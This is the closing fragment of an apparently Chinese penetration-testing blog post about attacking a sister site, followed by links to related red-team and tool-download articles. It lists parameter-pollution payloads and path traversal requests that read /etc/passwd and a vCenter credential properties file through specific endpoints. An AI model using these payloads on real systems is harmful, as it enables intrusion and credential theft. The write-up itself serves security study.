?id=1&id=2&id=exp
asp.net+iis:id=1,2,exp
asp+iis:id=1,2,exp
php+apache:id=exp
“url+/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd”
jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
#windows/eam/vib?id=C:ProgramDataVMwarevCenterServercfgvmware-vpxvcdb.properties
#linux/eam/vib?id=/etc/passwd
欢迎 在看丨留言丨分享至朋友圈 三连
好文推荐
-
实战杀猪盘渗透测试
-
三款windows下图形化应急响应工具 (附下载地址)
-
Nessus最新插件包20220925(附下载地址)
-
实战|一次不太成功的反诈骗渗透测试 -
CTF常用脚本工具(附下载地址) -
实战|一次对BC网站的渗透测试 -
实战|文件上传绕过的一次思路总结学习(两个上传点组合Getshell) -
AppScan10.0.8(附下载地址) -
BurpSuite_pro_v2022.8(附下载地址) -
一款强大的红队资产测绘工具 -
红队必备-防蜜罐抓到被打断腿 -
HVV之内存马检测工具 -
HVV中一种针对红队的新型溯源手段 -
HVV|蓝队防猝死手册 -
蓝队/红队钓鱼项目(附分析报告) -
红队防猝死手册 -
干货|红队全流程学习资料(附下载地址)
原文始发于微信公众号(乌雲安全):实战|记一次旁站渗透过程
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论